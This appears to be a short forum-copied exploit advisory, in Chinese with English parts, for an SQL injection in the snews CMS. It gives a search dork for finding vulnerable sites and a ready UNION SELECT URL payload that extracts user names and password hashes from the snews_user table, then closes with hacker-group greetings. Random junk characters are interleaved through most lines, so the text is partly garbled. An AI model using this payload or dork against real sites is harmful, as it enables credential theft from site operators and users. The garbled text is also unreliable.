标题: CMS snews SQL Injection Vulnerability
4 ] O- P2 x/ `& @* q- J作者: By onestree
# N* C6 T5 Q, @6 c$ d6 l' I& Q: b& ?下载地址 : http://snewscms.com/
; d+ u* j4 O) s/ D3 D2 a( i8 a测试平台 : ubuntu 12.10 / win 7
) ^2 W. E! N4 ^$ ]3 Y关键词: inurl:"tanyakan pada rumput yang bergoyang"1 [5 H8 ]' ^# U. h1 L# \
( q5 Q- a. b- F$ k, P
/ \* Y) S! ^& n; E*************************************************************
# C' k+ N, m( K/ X* T0 Z
8 r* P# B( ~7 m+ J3 x, uSQL poc:
' X- e! ~. B3 | 0 \8 p+ ]! Q; i- l- h
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
) W3 n) W$ u. R4 u0 v
8 B9 i; f' A! S示例- u8 C' d( Q7 u) _
" X P1 Z L3 u& s: M" U+ K
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
4 V) |' L7 y+ `1 \9 _ m
: i/ t- s+ }. i* f- d. M - o4 z) T5 X3 Y
致谢:
# d6 i2 h( o$ P7 t2 X6 W
9 d- ~; N$ N( \* C Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ @$ H( n, z5 }; ]
# e+ j* p7 O( K7 b% y( M/ L$ N7 H indonesiancoder - moeslimh4x0r - go-coder' t( o6 v u8 Q5 z# M. y, J
3 |6 |" s" V O, N
spesial my hunny :*7 V5 x" z8 _5 P m5 \/ q8 G
|